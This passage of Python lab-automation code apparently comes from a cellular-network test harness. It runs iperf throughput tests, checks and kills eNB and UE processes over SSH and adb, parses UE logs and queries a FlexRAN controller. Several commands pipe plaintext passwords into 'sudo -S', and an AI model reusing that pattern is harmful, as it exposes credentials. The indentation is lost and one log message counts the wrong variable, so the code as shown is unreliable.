SSH.command('killall --signal SIGKILL iperf', '\$', 5)
time.sleep(0.5)
SSH.close()
if (clientStatus == -1):
if (os.path.isfile('iperf_server_' + self.testCase_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '.log')
SSH.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
# copying on the EPC server for logCollection
if (clientStatus == -1):
copyin_res = SSH.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', EPC.SourceCodePath + '/scripts')
copyin_res = SSH.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_OAI-UE.log', EPC.SourceCodePath + '/scripts')
iperf_noperf = False
if status_queue.empty():
iperf_status = False
else:
iperf_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf(self):
result = re.search('noS1', str(RAN.Initialize_eNB_args))
if result is not None:
self.IperfNoS1()
return
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
logging.debug('going here')
HTML.CreateHtmlTestRow(self.iperf_args, 'KO', CONST.UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
self.dummyIperfVersion = '2.0.10'
#cmd = 'iperf --version'
#logging.debug(cmd + '\n')
#iperfStdout = subprocess.check_output(cmd, shell=True, universal_newlines=True)
#result = re.search('iperf version 2.0.5', str(iperfStdout.strip()))
#if result is not None:
# dummyIperfVersion = '2.0.5'
#result = re.search('iperf version 2.0.10', str(iperfStdout.strip()))
#if result is not None:
# dummyIperfVersion = '2.0.10'
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
HTML.CreateHtmlTestRow(self.iperf_args, 'KO', CONST.ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def CheckProcessExist(self, check_eNB, check_OAI_UE):
multi_jobs = []
status_queue = SimpleQueue()
# in noS1 config, no need to check status from EPC
# in gNB also currently no need to check
result = re.search('noS1|band78', str(RAN.Initialize_eNB_args))
if result is None:
p = Process(target = EPC.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = EPC.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = EPC.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
else:
if (check_eNB == False) and (check_OAI_UE == False):
return 0
if check_eNB:
p = Process(target = RAN.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if check_OAI_UE:
p = Process(target = self.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == CONST.ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(RAN.eNBLogFiles[0]))
if fileCheck is not None:
SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/' + RAN.eNBLogFiles[0], '.')
logStatus = RAN.AnalyzeLogFile_eNB(RAN.eNBLogFiles[0])
if logStatus < 0:
result = logStatus
RAN.eNBLogFiles[0]=''
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
self.TerminateFlexranCtrl()
return result
def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
multi_jobs = []
status_queue = SimpleQueue()
if initialize_OAI_UE_flag == False:
p = Process(target = self.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == CONST.OAI_UE_PROCESS_FAILED:
fileCheck = re.search('ue_', str(self.UELogFile))
if fileCheck is not None:
SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
if logStatus < 0:
result = logStatus
return result
def CheckOAIUEProcess(self, status_queue):
try:
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('stdbuf -o0 ps -aux | grep --color=never ' + self.air_interface + ' | grep -v grep', '\$', 5)
result = re.search(self.air_interface, SSH.getBefore())
if result is None:
logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
status_queue.put(CONST.OAI_UE_PROCESS_FAILED)
else:
status_queue.put(CONST.OAI_UE_PROCESS_OK)
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_UE(self, UElogFile):
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
f1aRetransmissionCount = 0
fatalErrorCount = 0
macBsrTimerExpiredCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
nrUEFlag = False
nrDecodeMib = 0
nrFoundDCI = 0
nrCRCOK = 0
mbms_messages = 0
HTML.htmlUEFailureMsg=''
global_status = CONST.ALL_PROCESSES_OK
for line in ue_log_file.readlines():
result = re.search('nr_synchro_time', str(line))
if result is not None:
nrUEFlag = True
if nrUEFlag:
result = re.search('decode mib', str(line))
if result is not None:
nrDecodeMib += 1
result = re.search('found 1 DCIs', str(line))
if result is not None:
nrFoundDCI += 1
result = re.search('CRC OK', str(line))
if result is not None:
nrCRCOK += 1
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Format1A Retransmission but TBS are different', str(line))
if result is not None and not exitSignalReceived:
f1aRetransmissionCount += 1
result = re.search('FATAL ERROR', str(line))
if result is not None and not exitSignalReceived:
fatalErrorCount += 1
result = re.search('MAC BSR Triggered ReTxBSR Timer expiry', str(line))
if result is not None and not exitSignalReceived:
macBsrTimerExpiredCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
if RAN.eNBmbmsEnables[0]:
result = re.search('TRIED TO PUSH MBMS DATA', str(line))
if result is not None:
mbms_messages += 1
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : \-*(?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + str(freq) + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrUEFlag:
if nrDecodeMib > 0:
statMsg = 'UE showed ' + str(nrDecodeMib) + ' MIB decode message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrFoundDCI > 0:
statMsg = 'UE showed ' + str(nrFoundDCI) + ' DCI found message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrCRCOK > 0:
statMsg = 'UE showed ' + str(nrCRCOK) + ' PDSCH decoding message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if not frequency_found:
statMsg = 'NR-UE could NOT synch!'
logging.error('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1(A)" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if f1aRetransmissionCount > 0:
statMsg = 'UE showed ' + str(f1aRetransmissionCount) + ' "Format1A Retransmission but TBS are different" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if fatalErrorCount > 0:
statMsg = 'UE showed ' + str(fatalErrorCount) + ' "FATAL ERROR:" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if macBsrTimerExpiredCount > 0:
statMsg = 'UE showed ' + str(fatalErrorCount) + ' "MAC BSR Triggered ReTxBSR Timer expiry" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if RAN.eNBmbmsEnables[0]:
if mbms_messages > 0:
statMsg = 'UE showed ' + str(mbms_messages) + ' "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
else:
statMsg = 'UE did NOT SHOW "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;41m ' + statMsg + ' \u001B[0m')
global_status = CONST.OAI_UE_PROCESS_NO_MBMS_MSGS
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
if not nrUEFlag:
global_status = CONST.OAI_UE_PROCESS_SEG_FAULT
else:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE showed an assertion!\n'
if not nrUEFlag:
if not mib_found or not frequency_found:
global_status = CONST.OAI_UE_PROCESS_ASSERTION
else:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE faced real time issues!\n'
if nrUEFlag:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_COULD_NOT_SYNC
else:
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE could not synchronize!\n'
global_status = CONST.OAI_UE_PROCESS_COULD_NOT_SYNC
return global_status
def TerminateFlexranCtrl(self):
if RAN.flexranCtrlInstalled == False or RAN.flexranCtrlStarted == False:
return
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('echo ' + EPC.Password + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
SSH.command('echo ' + EPC.Password + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
SSH.close()
RAN.flexranCtrlStarted=False
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# back in airplane mode on (ie radio off)
if self.ADBCentralized:
#RH quick add on to intgrate cots control defined by yaml
#if device Id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode ON (ie Radio OFF)
COTS_UE.Set_Airplane(device_id, 'ON')
elif device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"', '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', SSH.getBefore())
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"', '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = False
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target= self.TerminateUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def TerminateOAIUE(self):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
SSH.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('-uesoftmodem', SSH.getBefore())
if result is not None:
SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT -r .*-uesoftmodem || true', '\$', 5)
time.sleep(10)
SSH.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('-uesoftmodem', SSH.getBefore())
if result is not None:
SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL -r .*-uesoftmodem || true', '\$', 5)
time.sleep(5)
SSH.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
SSH.close()
result = re.search('ue_', str(self.UELogFile))
if result is not None:
copyin_res = SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
HTML.htmlUEFailureMsg='Could not copy UE logfile to analyze it!'
HTML.CreateHtmlTestRow('N/A', 'KO', CONST.OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
self.UELogFile = ''
return
logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is not None:
ueAction = 'Sniffing'
else:
ueAction = 'Connection'
if (logStatus < 0):
logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
HTML.htmlUEFailureMsg='<b>' + ueAction + ' Failed</b>\n' + HTML.htmlUEFailureMsg
HTML.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
if self.air_interface == 'lte-uesoftmodem':
# In case of sniffing on commercial eNBs we have random results
# Not an error then
if (logStatus != CONST.OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
if (logStatus == CONST.OAI_UE_PROCESS_COULD_NOT_SYNC):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
HTML.htmlUEFailureMsg='<b>' + ueAction + ' Completed</b>\n' + HTML.htmlUEFailureMsg
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
self.UELogFile = ''
else:
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of UE'
HTML.desc='Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-OAI-UE'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of OAI-UE'
HTML.desc='Automatic Termination of OAI-UE'
self.ShowTestID()
self.TerminateOAIUE()
if (RAN.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of eNB'
HTML.desc='Automatic Termination of eNB'
self.ShowTestID()
RAN.eNB_instance=0
RAN.TerminateeNB()
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
self.testCase_id = 'AUTO-KILL-flexran-ctl'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of FlexRan CTL'
HTML.desc='Automatic Termination of FlexRan CTL'
self.ShowTestID()
self.TerminateFlexranCtrl()
RAN.prematureExit=True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
HTML.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', CONST.ALL_PROCESSES_OK)
def X2_Status(self, idx, fileName):
cmd = "curl --silent http://" + EPC.IPAddress + ":9999/stats | jq '.' > " + fileName
message = cmd + '\n'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
if idx == 0:
cmd = "jq '.mac_stats | length' " + fileName
strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2NbENBs = int(strNbEnbs.strip())
cnt = 0
while cnt < self.x2NbENBs:
cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBBsIds[idx].append(bs_id.strip())
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
nbUEs = int(stNbUEs.strip())
ueIdx = 0
self.x2ENBConnectedUEs[idx].append([])
while ueIdx < nbUEs:
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
ueIdx += 1
cnt += 1
msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
logging.debug(msg)
message += msg + '\n'
cnt = 0
while cnt < self.x2NbENBs:
msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
logging.debug(msg)
message += msg + '\n'
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
logging.debug(msg)
message += msg + '\n'
ueIdx += 1
cnt += 1
return message
def Perform_X2_Handover(self):
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl -XPOST http://" + EPC.IPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(10)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
